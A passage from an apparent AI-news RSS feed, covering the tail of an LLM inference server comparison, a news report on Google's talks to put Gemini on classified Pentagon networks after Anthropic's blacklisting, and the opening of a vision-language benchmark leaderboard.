          <td>TensorRT-LLM</td>
          <td>Apache 2.0</td>
          <td>Via Triton</td>
          <td>TP + PP</td>
          <td>FP4, FP8, INT8</td>
          <td>Yes</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>TGI</td>
          <td>Apache 2.0</td>
          <td>Yes</td>
          <td>TP</td>
          <td>FP8, AWQ, GPTQ, EETQ</td>
          <td>Yes</td>
          <td>Limited</td>
      </tr>
      <tr>
          <td>llama.cpp</td>
          <td>MIT</td>
          <td>Yes</td>
          <td>Limited</td>
          <td>1.5b-8b GGUF, k-quants</td>
          <td>No</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>Ollama</td>
          <td>MIT</td>
          <td>Yes</td>
          <td>No</td>
          <td>GGUF (via llama.cpp)</td>
          <td>No</td>
          <td>Limited</td>
      </tr>
      <tr>
          <td>LMDeploy</td>
          <td>Apache 2.0</td>
          <td>Yes</td>
          <td>TP</td>
          <td>FP8, INT4/8, AWQ</td>
          <td>No</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>MLC-LLM</td>
          <td>Apache 2.0</td>
          <td>Yes</td>
          <td>TP</td>
          <td>FP8, INT4, AWQ, GPTQ</td>
          <td>No</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Aphrodite</td>
          <td>AGPL-3.0</td>
          <td>Yes + KoboldAI</td>
          <td>TP + PP</td>
          <td>FP2-FP12, AWQ, GPTQ, GGUF, + 10 more</td>
          <td>Yes</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>DeepSpeed-MII</td>
          <td>Apache 2.0</td>
          <td>Partial</td>
          <td>TP</td>
          <td>INT8, FP16</td>
          <td>No</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>Triton Server</td>
          <td>BSD 3-Clause</td>
          <td>Via backends</td>
          <td>TP + PP</td>
          <td>Via TRT-LLM</td>
          <td>Via TRT-LLM</td>
          <td>Via TRT-LLM</td>
      </tr>
      <tr>
          <td>Ray Serve</td>
          <td>Apache 2.0</td>
          <td>Via vLLM</td>
          <td>TP + PP</td>
          <td>Via underlying engine</td>
          <td>Via engine</td>
          <td>Via engine</td>
      </tr>
  </tbody>
</table>
<p><em>TP = Tensor Parallelism, PP = Pipeline Parallelism, EP = Expert Parallelism</em></p>
<hr>
<h2 id="use-case-decision-matrix">Use-Case Decision Matrix</h2>
<p><strong>You want the safest default for production serving</strong> - start with vLLM. Broadest model support, active community, Apache 2.0, and solid documentation. Pick SGLang if you confirm prefix-heavy workloads.</p>
<p><strong>Your workload involves RAG or multi-turn agents</strong> - switch to SGLang. The RadixAttention prefix caching compounds across requests in ways that vLLM's implementation doesn't match. For <a href="/tools/best-ai-rag-tools-2026">RAG tool integrations</a>, this is often a 20-30% cost reduction in practice.</p>
<p><strong>You're running a fixed high-traffic model on H100/B200</strong> - TensorRT-LLM delivers the best throughput numbers. Accept the 28-minute compilation as a one-time build cost per model version.</p>
<p><strong>You need CPU inference, Apple Silicon, or air-gapped deployments</strong> - llama.cpp is the right engine. Ollama adds a friendlier interface. Neither scales to high concurrent load.</p>
<p><strong>You're focused on quantized inference budget</strong> - LMDeploy for Int4 on A100/A800, especially for InternLM models or any workload where you want lowest TTFT at low precision.</p>
<p><strong>You need edge, mobile, or browser deployment</strong> - MLC-LLM is the only viable open-source option.</p>
<p><strong>You're on the Azure/DeepSpeed ecosystem</strong> - DeepSpeed-MII integrates naturally and offers solid performance within that stack.</p>
<p><strong>You need structured JSON outputs at scale</strong> - SGLang with xGrammar. The compiled grammar caching is unique in the space.</p>
<p><strong>You're running many models or need routing/autoscaling</strong> - Ray Serve as the orchestration layer, wrapping vLLM or SGLang underneath. Check the <a href="/leaderboards/ai-speed-latency-leaderboard">AI speed and latency leaderboard</a> for how these stack up under real routing conditions.</p>
<p><strong>You want to benchmark your own hardware</strong> - <a href="/tools/llmfit-find-best-llm-for-your-hardware">LLMFit</a> is a useful starting point for calibrating expected throughput against your available GPU fleet.</p>
<div class="pull-quote">
<p>SGLang's RadixAttention ships a fundamentally different caching model from vLLM's prefix caching - the radix tree finds shared prefixes automatically, even when requests don't start identically.</p>
</div>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="is-vllm-still-the-best-inference-server-in-2026">Is vLLM still the best inference server in 2026?</h3>
<p>vLLM is the most flexible default, but SGLang and TensorRT-LLM beat it on raw throughput. The right choice depends on workload: vLLM for broad model support, SGLang for prefix-heavy or structured output workloads, TRT-LLM for maximum single-model throughput.</p>
<h3 id="should-i-migrate-away-from-tgi">Should I migrate away from TGI?</h3>
<p>Yes, for anything new. TGI entered maintenance mode on December 11, 2025, and no new features will be added. Both vLLM and SGLang are drop-in API replacements serving the same OpenAI-compatible endpoints.</p>
<h3 id="does-sglang-support-all-the-same-models-as-vllm">Does SGLang support all the same models as vLLM?</h3>
<p>Not yet. vLLM supports 200+ HuggingFace architectures; SGLang covers fewer. For the most recently released or niche models, vLLM is more likely to have support. Check the SGLang docs for the current model list before committing.</p>
<h3 id="when-does-tensorrt-llm-make-sense">When does TensorRT-LLM make sense?</h3>
<p>When you are serving a fixed model at sustained high concurrency on NVIDIA H100 or B200 hardware, and the 28-minute compilation cost is amortized over millions of requests. Not suitable for experimentation or multi-model serving.</p>
<h3 id="is-ollama-suitable-for-production">Is Ollama suitable for production?</h3>
<p>At low concurrency (under 4-8 simultaneous users), yes. Under higher load, response times degrade sharply and throughput plateaus. For customer-facing production serving, use vLLM or SGLang.</p>
<hr>
<h2 id="sources">Sources</h2>
<ul>
<li><a href="https://github.com/vllm-project/vllm">vLLM GitHub (v0.19.0)</a></li>
<li><a href="https://github.com/sgl-project/sglang">SGLang GitHub (v0.5.10)</a></li>
<li><a href="https://github.com/NVIDIA/TensorRT-LLM">NVIDIA TensorRT-LLM GitHub</a></li>
<li><a href="https://github.com/huggingface/text-generation-inference">HuggingFace TGI GitHub</a></li>
<li><a href="https://github.com/ggml-org/llama.cpp">llama.cpp GitHub</a></li>
<li><a href="https://github.com/InternLM/lmdeploy">InternLM LMDeploy GitHub</a></li>
<li><a href="https://github.com/mlc-ai/mlc-llm">MLC-LLM GitHub</a></li>
<li><a href="https://github.com/aphrodite-engine/aphrodite-engine">Aphrodite Engine GitHub</a></li>
<li><a href="https://github.com/deepspeedai/DeepSpeed-MII">DeepSpeed-MII GitHub</a></li>
<li><a href="https://github.com/triton-inference-server/server">Triton Inference Server GitHub</a></li>
<li><a href="https://docs.ray.io/en/latest/serve/llm/index.html">Ray Serve LLM Docs</a></li>
<li><a href="https://www.spheron.network/blog/vllm-vs-tensorrt-llm-vs-sglang-benchmarks/">Spheron vLLM vs TRT-LLM vs SGLang H100 Benchmarks</a></li>
<li><a href="https://blog.premai.io/vllm-vs-sglang-vs-lmdeploy-fastest-llm-inference-engine-in-2026/">Prem AI: vLLM vs SGLang vs LMDeploy 2026</a></li>
<li><a href="https://blog.premai.io/llm-inference-servers-compared-vllm-vs-tgi-vs-sglang-vs-triton-2026/">Prem AI: LLM Inference Servers Compared 2026</a></li>
<li><a href="https://www.linkedin.com/posts/lysandredebut_text-generation-inference-is-now-in-maintenance-activity-7404903648062885888-WK42">Lysandre Debut - TGI Maintenance Mode Announcement</a></li>
<li><a href="https://docs.vllm.ai/en/v0.8.1/design/automatic_prefix_caching.html">vLLM Automatic Prefix Caching Docs</a></li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Tools</category><media:content url="https://awesomeagents.ai/images/tools/best-open-source-llm-inference-servers-2026_hu_4fcb4a6e31f5d3a3.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/tools/best-open-source-llm-inference-servers-2026_hu_4fcb4a6e31f5d3a3.jpg" width="1200" height="675"/></item><item><title>Google Bids for Pentagon&amp;#39;s Classified Gemini Contract</title><link>https://awesomeagents.ai/news/google-pentagon-gemini-classified-talks/</link><pubDate>Fri, 17 Apr 2026 13:45:50 +0200</pubDate><guid>https://awesomeagents.ai/news/google-pentagon-gemini-classified-talks/</guid><description><![CDATA[<div class="podcast-embed">
<iframe style="border-radius:12px" src="https://open.spotify.com/embed/episode/73S0rVFmsa1ehnJXOnk6Sv?utm_source=generator&theme=0" width="100%" height="152" frameBorder="0" allowfullscreen="" allow="autoplay; clipboard-write; encrypted-media; fullscreen; picture-in-picture" loading="lazy"></iframe>
</div>
<p>Google is in active negotiations with the Department of Defense to deploy Gemini AI on classified networks, according to The Information, which cited two people with direct knowledge of the talks. If finalized, the deal would take Google well beyond its existing unclassified footprint at the Pentagon and into the sensitive data environments where Anthropic's Claude was rolled out before the company was <a href="/news/anthropic-sues-pentagon-blacklist/">blacklisted in March</a>.</p>]]></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<div class="podcast-embed">
<iframe style="border-radius:12px" src="https://open.spotify.com/embed/episode/73S0rVFmsa1ehnJXOnk6Sv?utm_source=generator&theme=0" width="100%" height="152" frameBorder="0" allowfullscreen="" allow="autoplay; clipboard-write; encrypted-media; fullscreen; picture-in-picture" loading="lazy"></iframe>
</div>
<p>Google is in active negotiations with the Department of Defense to deploy Gemini AI on classified networks, according to The Information, which cited two people with direct knowledge of the talks. If finalized, the deal would take Google well beyond its existing unclassified footprint at the Pentagon and into the sensitive data environments where Anthropic's Claude was rolled out before the company was <a href="/news/anthropic-sues-pentagon-blacklist/">blacklisted in March</a>.</p>
<p>The talks are the clearest sign yet that the Anthropic fallout has reshuffled the government AI market in ways that benefit Google directly.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>Google is negotiating classified-network access for Gemini at the Pentagon, per The Information</li>
<li>The proposed contract covers &quot;all lawful purposes&quot; - but Google is pushing for explicit bans on domestic mass surveillance and autonomous weapons without human control</li>
<li>Anthropic was blacklisted in March for holding those same positions; Google is now trying to win the same restrictions through negotiation rather than confrontation</li>
<li>No dollar amount has been disclosed and no deal has been signed</li>
</ul>
</div>
<h2 id="the-proposed-terms">The Proposed Terms</h2>
<p>The Pentagon has pushed all AI vendors to accept contracts covering &quot;all lawful purposes&quot; - language designed to give the military maximum flexibility over how it uses AI tools. Anthropic refused to remove carve-outs for domestic mass surveillance and fully autonomous weapons systems. The Pentagon responded by <a href="/news/anthropic-sues-pentagon-blacklist/">designating Anthropic a supply chain risk</a> on March 4 - the first American company ever to receive that designation.</p>
<p>Google's proposed terms in these negotiations reportedly include the same two restrictions: Gemini would be prohibited from use in domestic mass surveillance and from controlling autonomous weapons without appropriate human oversight.</p>
<blockquote>
<p>&quot;The Pentagon will continue to rapidly deploy frontier AI capabilities to the warfighter through strong industry partnerships across all classification levels.&quot;</p></blockquote>
<p>That statement, from a Pentagon spokesperson, didn't confirm the Google talks specifically. But the phrase &quot;all classification levels&quot; carries its own weight. Google's Under Secretary of Defense contact, CTO Emil Michael, made the direction explicit in March: &quot;I have high confidence they're going to be a great partner on all networks.&quot; Networks, plural. The unclassified GenAI.mil deployment, where <a href="/news/google-gemini-agents-pentagon-workforce/">Google already serves 3 million Pentagon workers</a>, was the first step.</p>
<h3 id="how-google-got-here">How Google Got Here</h3>
<p>Google's path to this negotiation runs through a deliberate reversal of its own stated principles.</p>
<p>In 2018, roughly 3,100 Google employees signed a letter demanding the company exit Project Maven, a DoD contract using machine learning to analyze drone footage. Google walked away when the contract expired in 2019. That decision was treated internally as a commitment: Google wouldn't build AI for warfare.</p>
<p>By early 2025, Google had quietly removed those restrictions. The company signed a &quot;$200 million prototype&quot; contract with the Pentagon in July 2025 with Anthropic, OpenAI, and xAI. In August it announced Gemini for Government. In December it became the first enterprise AI provider on GenAI.mil at launch. By March 2026, eight pre-built Gemini-powered agents were running across the unclassified tier, with 1.2 million unique users already on the platform.</p>
<p>The classified-network talks are the logical next step in that progression.</p>
<p><img src="/images/news/google-pentagon-gemini-classified-talks-pichai.jpg" alt="Sundar Pichai, Google CEO, at a 2023 government meeting">
<em>Sundar Pichai at a 2023 regulatory meeting. Google's leadership made a calculated decision to re-enter military AI after the 2018 Project Maven retreat.</em>
<small>Source: commons.wikimedia.org</small></p>
<h2 id="who-benefits-who-pays">Who Benefits, Who Pays</h2>
<table>
  <thead>
      <tr>
          <th>Stakeholder</th>
          <th>Impact</th>
          <th>Timeline</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td><strong>Google</strong></td>
          <td>Expands Gemini into classified defense markets; validates military AI strategy after 2018 Maven retreat</td>
          <td>If deal closes: 2026</td>
      </tr>
      <tr>
          <td><strong>Pentagon</strong></td>
          <td>Gets a replacement for Anthropic on classified networks, maintains vendor diversification</td>
          <td>Six-month Anthropic phase-out underway</td>
      </tr>
      <tr>
          <td><strong>Anthropic</strong></td>
          <td>Loses classified-network business to its main competitor; legal battle continues</td>
          <td>Preliminary injunction holds but appeal failed April 8</td>
      </tr>
      <tr>
          <td><strong>OpenAI</strong></td>
          <td>Already signed its own DoW agreement; competes with Google for classified-tier budget</td>
          <td>Ongoing</td>
      </tr>
      <tr>
          <td><strong>Google employees</strong></td>
          <td>More than 100 signed an internal letter opposing military Gemini use; 430+ joined a joint Google-OpenAI letter</td>
          <td>April 2026</td>
      </tr>
  </tbody>
</table>
<h3 id="companies">Companies</h3>
<p>Google's classified-network pitch puts it in direct competition with Microsoft, which has long served the intelligence community through dedicated Azure Government regions, and with Palantir, whose tools served as the conduit for classified Claude deployments before the Anthropic blacklisting. OpenAI signed its own Department of War agreement within hours of the Anthropic designation - an approach its own CEO later described as &quot;opportunistic and sloppy&quot; in internal communications reported by The Atlantic.</p>
<p>The Pentagon's stated strategy is deliberate vendor diversification. That makes the Google talks less about winner-takes-all and more about which vendors are willing to operate within terms the DoD will accept.</p>
<h3 id="users">Users</h3>
<p>Inside Google, the atmosphere is different from 2018. Employees who oppose military AI use are still organizing - the 100-person internal letter and the broader 430-person joint letter with OpenAI workers are real acts of dissent - but those involved acknowledge the company's direction has already changed. The fight has shifted from &quot;get Google out of defense&quot; to &quot;force Google to maintain limits.&quot;</p>
<p>Whether those limits survive the negotiation is the open question.</p>
<h3 id="competitors">Competitors</h3>
<p>The Anthropic situation offers a useful data point. Pentagon CTO Emil Michael's public criticism of Anthropic's position was direct: &quot;What we're not going to do is let any one company dictate a new set of policies above and beyond what Congress has passed.&quot; The framing cast Anthropic's safety restrictions as anti-democratic overreach.</p>
<p>Google is attempting to win the same restrictions - no mass surveillance, no autonomous weapons - through negotiation rather than as non-negotiable policy. If the Pentagon accepts those terms from Google, it'll be hard to argue the Anthropic blacklisting was ever really about the substance of the restrictions.</p>
<p><img src="/images/news/google-pentagon-gemini-classified-talks-datacenter.jpg" alt="Google datacenter facility in The Dalles, Oregon">
<em>Google's cloud infrastructure will form the backbone of any classified Gemini deployment. The Pentagon already routes 1.2 million users through unclassified Gemini services.</em>
<small>Source: commons.wikimedia.org</small></p>
<h2 id="the-anthropic-parallel">The Anthropic Parallel</h2>
<p>The <a href="/news/trump-administration-anthropic-paradox-ban-and-deploy/">Trump administration's handling of Anthropic</a> has been contradictory enough that some observers question whether the blacklisting was ever primarily about safety policy. On March 4, the Pentagon designated Anthropic a supply chain risk. Within hours it signed a new agreement with OpenAI. The same week, Treasury Secretary Bessent was meeting with Wall Street banks to encourage Claude adoption in financial services.</p>
<p><a href="/news/anthropic-wins-injunction-pentagon-ban/">Anthropic's injunction lawsuit</a> secured a preliminary block on the ban's enforcement - a federal judge found evidence of First Amendment retaliation. But Anthropic lost an appeals court bid on April 8 to extend that protection pending the full litigation, leaving the legal picture split. Classified Claude deployments, which ran through Palantir and AWS, remain in a months-long phase-out.</p>
<p>Google's classified-network talks advance during that phase-out. The timing isn't subtle.</p>
<hr>
<h2 id="what-happens-next">What Happens Next</h2>
<p>No dollar figure has been disclosed for the classified-network agreement, and no deal has been confirmed as of publication. The existing July 2025 Pentagon contracts paid up to $200 million each to Google, Anthropic, OpenAI, and xAI for prototype development. A classified-network extension would likely be a separate procurement.</p>
<p>The more consequential variable is the negotiated safeguards. If the Pentagon accepts Google's proposed restrictions on mass surveillance and autonomous weapons, the Anthropic blacklisting looks less like a principled line and more like a negotiating failure. That outcome would validate Anthropic's underlying positions while punishing the company for how it defended them - a distinction unlikely to comfort either side.</p>
<p>The <a href="/news/altman-pentagon-deal-sloppy-1-5m-boycott/">OpenAI-Google competition for the Pentagon's AI budget</a> is now moving into classified territory. The next milestone is whether Emil Michael signs a deal that includes the safeguard language Google is pushing, or whether the Pentagon holds the same line it drew against Anthropic.</p>
<p><strong>Sources:</strong> <a href="https://www.theinformation.com/">The Information (original report, paywalled)</a>, <a href="https://www.newsweek.com/pentagon-weighs-googles-gemini-ai-for-military-use-anthropic-fallout-11839175">Newsweek - Pentagon Weighs Google Gemini After Anthropic Fallout</a>, <a href="https://www.bangordailynews.com/2026/04/16/politics/washington/google-pentagon-gemini-ai-negotiations/">Reuters/Bangor Daily News - Google Pentagon Negotiations</a>, <a href="https://winbuzzer.com/2026/03/11/google-deploys-gemini-ai-agents-pentagon-dod-partnership-xcxwbn/">Winbuzzer - Google Deploys Gemini Agents at Pentagon</a>, <a href="https://winbuzzer.com/2026/04/05/google-workers-find-its-a-different-era-for-activism-on-military-ai-xcxwbn/">Winbuzzer - Google Workers and Military AI Activism</a>, <a href="https://sfstandard.com/opinion/2026/04/03/google-maven-anthropic-pentagon-ai/">SF Standard - Diane Greene Op-Ed on Maven</a>, <a href="https://www.cnbc.com/2026/03/04/pentagon-blacklist-anthropic-defense-tech-claude.html">CNBC - Pentagon Blacklists Anthropic</a>, <a href="https://www.cnbc.com/2026/04/08/anthropic-pentagon-court-ruling-supply-chain-risk.html">CNBC - Anthropic Loses Appeals Court Bid</a></p>
]]></content:encoded><dc:creator>Daniel Okafor</dc:creator><category>News</category><media:content url="https://awesomeagents.ai/images/news/google-pentagon-gemini-classified-talks_hu_17a09eb935ca281d.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/news/google-pentagon-gemini-classified-talks_hu_17a09eb935ca281d.jpg" width="1200" height="675"/></item><item><title>Vision-Language Benchmarks: Image Reasoning Ranked</title><link>https://awesomeagents.ai/leaderboards/vision-language-benchmarks-leaderboard/</link><pubDate>Fri, 17 Apr 2026 13:27:00 +0200</pubDate><guid>https://awesomeagents.ai/leaderboards/vision-language-benchmarks-leaderboard/</guid><description>&lt;p>If you've read our &lt;a href="/leaderboards/multimodal-benchmarks-leaderboard/">multimodal benchmarks leaderboard&lt;/a>, you've already seen the summary view - top models, aggregate rankings, how MMMU-Pro and Video-MMMU stack up. This leaderboard covers narrower but harder ground: image reasoning and document understanding specifically, where the tasks are interpreting charts from scientific papers, reading scanned invoices, solving math problems from geometry diagrams, and recognizing structure in complex visual layouts. Audio, video, and general multimodal capability sit elsewhere. The question here is whether a model can actually think about what it sees in a still image.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>If you've read our <a href="/leaderboards/multimodal-benchmarks-leaderboard/">multimodal benchmarks leaderboard</a>, you've already seen the summary view - top models, aggregate rankings, how MMMU-Pro and Video-MMMU stack up. This leaderboard covers narrower but harder ground: image reasoning and document understanding specifically, where the tasks are interpreting charts from scientific papers, reading scanned invoices, solving math problems from geometry diagrams, and recognizing structure in complex visual layouts. Audio, video, and general multimodal capability sit elsewhere. The question here is whether a model can actually think about what it sees in a still image.</p>
<p>The benchmarks in this space have grown substantially more demanding since 2023. The original MMMU was largely saturated by mid-2025. ChartQA and DocVQA, while still useful, are now cleared by most frontier models above 90%. The interesting signal in 2026 comes from MMMU-Pro (harder exam questions, 10-option answers), CharXiv-R (realistic scientific charts from arXiv papers), and OCRBench v2 (bilingual text recognition with 31 task scenarios). These are the benchmarks where gaps between models still tell you something.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>Claude Opus 4.7 leads CharXiv-R at 91.0% - the strongest chart reasoning result from any currently available model</li>
<li>Gemini 3.1 Pro tops MMMU-Pro at 82%, with strong document and chart scores across the board</li>
<li>Open-source picks: Qwen3-VL and InternVL3 both clear 95% on DocVQA and lead the community on RealWorldQA and BLINK</li>
</ul>
</div>
<h2 id="the-benchmarks-explained">The Benchmarks Explained</h2>
<h3 id="mmmu-and-mmmu-pro">MMMU and MMMU-Pro</h3>
<p>MMMU (Massive Multi-discipline Multimodal Understanding) contains 11,500 college-level problems across 30 subjects, each requiring understanding of images such as figures, charts, diagrams, and photographs. The original version is no longer useful for frontier model differentiation - top models score above 80% and gaps have compressed to noise.</p>
<p>MMMU-Pro matters more now. It expanded the answer option count from 4 to 10 (reducing random guessing value), removed questions answerable without reading the image, and added harder multi-step problems. Where top models scored 75% on the original, they score 65-82% on MMMU-Pro. The floor rose but the ceiling spread back out, which is exactly what you want from an evaluation benchmark.</p>
<h3 id="mathvista">MathVista</h3>
<p>MathVista tests mathematical reasoning in visual contexts: bar charts with partial data, geometry diagrams with unlabeled angles, function plots that require inference, statistical tables where you need to calculate something that isn't written. It combines 28 existing visual math datasets with three new ones. The test isn't just vision - it requires the model to correctly read the visual element and then perform non-trivial math.</p>
<h3 id="chartqa-and-charxiv">ChartQA and CharXiv</h3>
<p>ChartQA asks questions about charts drawn in fairly clean presentation styles. It's scored at 90%+ by most frontier models today, which means it's best used to identify weak performers rather than rank the top tier.</p>
<p>CharXiv is meaningfully harder. The charts come from actual arXiv papers - the kind with dual y-axes, inset subplots, color-coded multi-series data, unconventional labeling, and statistical notation. CharXiv-R specifically assesses reasoning questions that require synthesizing information across the full chart, not just reading off a number. Human performance sits at 80.5%. Top models reached that range only in late 2025.</p>
<h3 id="docvqa">DocVQA</h3>
<p>DocVQA uses scanned or photographed documents - forms, invoices, contracts, research papers with tables - and asks free-form questions about their content. The challenge is handling poor image quality, varied fonts, complex layouts, and text that wraps around form fields. It tests a capability with direct enterprise value: automated document processing.</p>
<h3 id="ocrbench-v2">OCRBench v2</h3>
<p>OCRBench v2 is a sizable upgrade over the original, expanding to 10,000 human-verified question-answer pairs across 31 scenario types including handwritten text, mathematical notation, multilingual content, and degraded documents. English OCR leader as of Q1 2026 is Seed1.6-vision at 62.2%, which tells you this is still a hard benchmark with real headroom.</p>
<h3 id="ai2d">AI2D</h3>
<p>AI2D tests scientific diagram comprehension - the kind of figures found in textbooks and biology papers showing cell structures, geological processes, and physical systems. Most frontier models now clear 89-94%, placing this benchmark in the same category as ChartQA for differentiation purposes. It's useful for identifying capable models at lower capability tiers.</p>
<h3 id="blink">BLINK</h3>
<p>BLINK reformats 14 classic computer vision tasks - relative depth, visual correspondence, spatial reasoning, multi-view geometry - into 3,807 multiple-choice questions. These are perceptual tasks that humans solve almost instantly but models struggle with. The benchmark's name is literal: the tasks should take humans a blink. When the original BLINK launched, GPT-4V scored 51% while humans averaged 95%. The gap has since closed substantially, but BLINK remains a good test of genuine perceptual grounding rather than pattern matching from training data.</p>
<h3 id="realworldqa">RealWorldQA</h3>
<p>Released by xAI with Grok-1.5 Vision, RealWorldQA uses over 700 images taken from vehicles and real-world outdoor scenarios, each paired with a spatial reasoning question. It tests the kind of situational awareness relevant to robotics and autonomous systems, not academic benchmarks. The question set is small enough that statistical noise is a concern, but it adds a practical dimension that most other benchmarks lack.</p>
<hr>
<h2 id="rankings-table">Rankings Table</h2>
<p>Scores reflect the best publicly reported results as of April 2026. Where a model has multiple evaluation configurations (e.g., with vs. without extended thinking), the higher result is listed. Scores marked with a dash were not publicly reported at time of writing.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>MMMU-Pro</th>
          <th>MathVista</th>
          <th>CharXiv-R</th>
          <th>DocVQA</th>
          <th>ChartQA</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Gemini 3.1 Pro</td>
          <td>Google DeepMind</td>
          <td><strong>82%</strong></td>
          <td>75%</td>
          <td>-</td>
          <td>92%</td>
          <td>90%</td>
      </tr>
      <tr>
          <td>2</td>
          <td>GPT-5.4</td>
          <td>OpenAI</td>
          <td>81%</td>
          <td>78.4%</td>
          <td>-</td>
          <td><strong>95%</strong></td>
          <td><strong>92.5%</strong></td>
      </tr>
      <tr>
          <td>3</td>
          <td>Claude Opus 4.7</td>
          <td>Anthropic</td>
          <td>-</td>
          <td>-</td>
          <td><strong>91.0%</strong></td>
          <td>-</td>
          <td>-</td>
      </tr>
      <tr>
          <td>4</td>
          <td>Gemini 3 Pro</td>
          <td>Google DeepMind</td>
          <td>81%</td>
          <td>82.3%</td>
          <td>81.4%</td>
          <td>89%</td>
          <td>89.1%</td>
      </tr>
      <tr>
          <td>5</td>
          <td>Claude Opus 4.6</td>
          <td>Anthropic</td>
          <td>77.3%</td>
          <td>-</td>
          <td>77.4%</td>
          <td>-</td>
          <td>-</td>
      </tr>
      <tr>
          <td>6</td>
          <td>GPT-5.2</td>
          <td>OpenAI</td>
          <td>79.5%</td>
          <td>-</td>
          <td>82.1%</td>
          <td>-</td>
          <td>-</td>
      </tr>
      <tr>
          <td>7</td>
          <td>Qwen3.6 Plus</td>
          <td>Alibaba</td>
          <td>78.8%</td>
          <td>-</td>
          <td>81.5%</td>
          <td>-</td>
          <td>-</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Qwen3-VL (72B)</td>
          <td>Alibaba</td>
          <td>69.3%</td>
          <td>85.8%</td>
          <td>-</td>
          <td>96.5%</td>
          <td>-</td>
      </tr>
      <tr>
          <td>9</td>
          <td>InternVL3-78B</td>
          <td>OpenGVLab</td>
          <td>-</td>
          <td>79.0%</td>
          <td>-</td>
          <td>95.4%</td>
          <td>89.7%</td>
      </tr>
      <tr>
          <td>10</td>
          <td>Llama 4 Maverick</td>
          <td>Meta</td>
          <td>-</td>
          <td>73.7%</td>
          <td>-</td>
          <td>94.4%</td>
          <td>90.0%</td>
      </tr>
  </tbody>
</table>
<p>A second table covering the benchmarks designed to test open-source models specifically:</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>BLINK</th>
          <th>RealWorldQA</th>
          <th>AI2D</th>
          <th>OCRBench</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Qwen3 VL 235B</td>
          <td>Alibaba</td>
          <td><strong>70.7%</strong></td>
          <td><strong>85.1%</strong></td>
          <td>89.7%</td>
          <td>-</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Qwen3.6 Plus</td>
          <td>Alibaba</td>
          <td>-</td>
          <td>85.4%</td>
          <td><strong>94.4%</strong></td>
          <td>-</td>
      </tr>
      <tr>
          <td>3</td>
          <td>InternVL3-78B</td>
          <td>OpenGVLab</td>
          <td>-</td>
          <td>78.0%</td>
          <td>89.7%</td>
          <td><strong>906</strong></td>
      </tr>
      <tr>
          <td>4</td>
          <td>Qwen3 VL 32B</td>
          <td>Alibaba</td>
          <td>67.3%</td>
          <td>79.0%</td>
          <td>89.5%</td>
          <td>-</td>
      </tr>
      <tr>
          <td>5</td>
          <td>Claude 3.5 Sonnet</td>
          <td>Anthropic</td>
          <td>-</td>
          <td>-</td>
          <td>94.7%</td>
          <td>-</td>
      </tr>
      <tr>
          <td>6</td>
          <td>Llama 4 Maverick</td>
          <td>Meta</td>
          <td>-</td>
          <td>-</td>
          <td>-</td>
          <td>-</td>
      </tr>
      <tr>
          <td>7</td>
          <td>Phi-4 Multimodal</td>
          <td>Microsoft</td>
          <td>61.3%</td>
          <td>-</td>
          <td>-</td>
          <td>-</td>
      </tr>
  </tbody>
</table>
<p><img src="/images/leaderboards/vision-language-benchmarks-leaderboard-chart.jpg" alt="Close-up of a business graph on paper showing data analysis">
<em>Chart understanding is one of the harder visual reasoning tasks - models must identify axes, read legends, and reason about relationships that aren't explicitly stated.</em>
<small>Source: pexels.com</small></p>
<hr>
<h2 id="key-takeaways">Key Takeaways</h2>
<h3 id="gemini-31-pro-leads-on-mmmu-pro-gpt-54-leads-on-documents">Gemini 3.1 Pro Leads on MMMU-Pro, GPT-5.4 Leads on Documents</h3>
<p>Gemini 3.1 Pro scores 82% on MMMU-Pro, the highest confirmed score on that benchmark from any currently available model. Its 92% on DocVQA and 90% on ChartQA are competitive but not dominant - GPT-5.4 scores 95% and 92.5% respectively on those two. The split makes sense architecturally. Google trained Gemini as a natively multimodal model from the beginning, which advantages it on broad academic visual reasoning. GPT-5.4 applies a stronger language model to extracted document representations, which advantages it on structured text extraction from forms and invoices.</p>
<p>For practitioners: Gemini 3.1 Pro is the better pick when the visual content is complex or diagram-heavy. GPT-5.4 is the better pick for production document processing pipelines where DocVQA-style extraction is the core task. You can read our <a href="/reviews/review-gemini-3-1-pro/">Gemini 3.1 Pro review</a> and <a href="/reviews/review-gpt-5-4/">GPT-5.4 review</a> for hands-on testing beyond benchmark scores.</p>
<h3 id="claude-opus-47-wins-scientific-charts">Claude Opus 4.7 Wins Scientific Charts</h3>
<p>Claude Opus 4.7 holds the top CharXiv-R score at 91.0%, 2.6 points above Muse Spark and well ahead of other frontier models. This result is directly tied to the resolution upgrade introduced with Opus 4.7 - maximum image input increased from 1,568px (1.15MP) to 2,576px (3.75MP), roughly 3.3x more pixels. Scientific charts from arXiv papers often pack dense information into small visual areas, and the resolution upgrade makes a concrete difference on exactly those cases.</p>
<p>The result also stands apart because CharXiv-R is scored independently from provider benchmarking pipelines. It uses charts from real papers rather than constructed datasets, making contamination less likely. For research and data analysis workflows where scientific figures are central, Opus 4.7's lead on this benchmark translates to practical value.</p>
<div class="pull-quote">
<p>Claude Opus 4.7's 91.0% on CharXiv-R is the highest chart reasoning score from any generally available model - and it's directly attributable to a 3.3x resolution increase.</p>
</div>
<h3 id="qwen-dominates-open-source-visual-reasoning">Qwen Dominates Open-Source Visual Reasoning</h3>
